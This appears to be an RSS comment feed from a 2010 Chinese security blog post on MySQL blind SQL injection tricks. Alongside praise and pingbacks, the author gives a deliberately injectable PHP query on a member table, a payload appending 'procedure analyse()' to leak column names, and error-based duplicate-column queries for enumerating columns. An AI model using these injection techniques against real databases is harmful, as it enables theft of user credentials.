<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="Magike 1.2.0 Release" -->
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Mysql 另类盲注中的一些技巧]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/62/</link>
<description>Looking for change</description>
<language>zh-cn-utf8</language>
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
<generator>Magike 1.2.0 Release</generator>
<webMaster>oldjun</webMaster><item>
<title><![CDATA[xi4oyu]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/62/#comment-647</link>
<author>><![CDATA[xi4oyu]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/62/#comment-647</guid>
<pubDate>Tue, 20 Apr 2010 08:17:59 +0800</pubDate>
<description><![CDATA[赞一个]]></description>
<content:encoded><![CDATA[<p>赞一个</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[雨中风铃]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/62/#comment-648</link>
<author>><![CDATA[雨中风铃]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/62/#comment-648</guid>
<pubDate>Tue, 20 Apr 2010 16:41:50 +0800</pubDate>
<description><![CDATA[在mysql命令行下使用procedure analyse可以获取字段名称，在注入时能否爆出字段名称？]]></description>
<content:encoded><![CDATA[<p>在mysql命令行下使用procedure analyse可以获取字段名称，在注入时能否爆出字段名称？</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[oldjun]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/62/#comment-650</link>
<author>><![CDATA[oldjun]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/62/#comment-650</guid>
<pubDate>Tue, 20 Apr 2010 19:10:30 +0800</pubDate>
<description><![CDATA[确实比较鸡肋，看运气了，说不定遇到下面这段代码呢：

$query=$db->query(&quot;select username,password from cdb_members where uid=1 limit $limit&quot;);
while($test = $db->fetch_array($query)) {
foreach($test as $value){
$arr[]=$value;
}
}
echo $arr[0];

http://127.0.0.1/bbs/test.php?limit=0,1
正常获取数据

http://127.0.0.1/bbs/test.php?limit=0,1 procedure analyse()
字段名称出来了]]></description>
<content:encoded><![CDATA[<p>确实比较鸡肋，看运气了，说不定遇到下面这段代码呢：<br /><br />$query=$db->query("select username,password from cdb_members where uid=1 limit $limit");<br />while($test = $db->fetch_array($query)) {<br />	foreach($test as $value){<br />		$arr[]=$value;<br />	}<br />}<br />echo $arr[0];<br /><br />http://127.0.0.1/bbs/test.php?limit=0,1<br />正常获取数据<br /><br />http://127.0.0.1/bbs/test.php?limit=0,1 procedure analyse()<br />字段名称出来了</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[B100d5w0rd]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/62/#comment-651</link>
<author>><![CDATA[B100d5w0rd]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/62/#comment-651</guid>
<pubDate>Wed, 21 Apr 2010 18:13:01 +0800</pubDate>
<description><![CDATA[偶像就是偶像啊，学习了，膜拜
不过盲射实在太累了，遇到情愿不日了哈哈]]></description>
<content:encoded><![CDATA[<p>偶像就是偶像啊，学习了，膜拜<br />不过盲射实在太累了，遇到情愿不日了哈哈</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[menzhi007]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/62/#comment-657</link>
<author>><![CDATA[menzhi007]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/62/#comment-657</guid>
<pubDate>Tue, 04 May 2010 19:34:31 +0800</pubDate>
<description><![CDATA[再赞一个]]></description>
<content:encoded><![CDATA[<p>再赞一个</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[nod32升级id &raquo; Mysql另类盲注中的一些技巧 By oldjun]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/62/#comment-665</link>
<author>><![CDATA[nod32升级id &raquo; Mysql另类盲注中的一些技巧 By oldjun]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/62/#comment-665</guid>
<pubDate>Sat, 08 May 2010 01:04:24 +0800</pubDate>
<description><![CDATA[[...][...]]]></description>
<content:encoded><![CDATA[<p>[...][...]</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[  Mysql另类盲注中的一些技巧&nbsp;|&nbsp;kindle&#039;s blog]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/62/#comment-667</link>
<author>><![CDATA[  Mysql另类盲注中的一些技巧&nbsp;|&nbsp;kindle&#039;s blog]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/62/#comment-667</guid>
<pubDate>Wed, 12 May 2010 10:06:44 +0800</pubDate>
<description><![CDATA[[...][...]]]></description>
<content:encoded><![CDATA[<p>[...][...]</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[oldjun]]></title>
<link>http://www.oldjun.com/blog/index.php/archives/62/#comment-766</link>
<author>><![CDATA[oldjun]]></author>
<guid>http://www.oldjun.com/blog/index.php/archives/62/#comment-766</guid>
<pubDate>Thu, 22 Jul 2010 00:34:16 +0800</pubDate>
<description><![CDATA[mysql> select * from mysql.user where exists(select * from (select * from func a join func b) as c);
ERROR 1060 (42S21): Duplicate column name &#39;name&#39;
mysql> select * from mysql.user where exists(select * from (select * from func a join func b using(name)) as c);
ERROR 1060 (42S21): Duplicate column name &#39;ret&#39;
mysql> select * from mysql.user where exists(select * from (select * from func a join func b using(name,ret)) as c);
ERROR 1060 (42S21): Duplicate column name &#39;dl&#39;]]></description>
<content:encoded><![CDATA[<p>mysql> select * from mysql.user where exists(select * from (select * from func a join func b) as c);<br />ERROR 1060 (42S21): Duplicate column name 'name'<br />mysql> select * from mysql.user where exists(select * from (select * from func a join func b using(name)) as c);<br />ERROR 1060 (42S21): Duplicate column name 'ret'<br />mysql> select * from mysql.user where exists(select * from (select * from func a join func b using(name,ret)) as c);<br />ERROR 1060 (42S21): Duplicate column name 'dl'</p>]]></content:encoded>
</item>
</channel>
</rss>
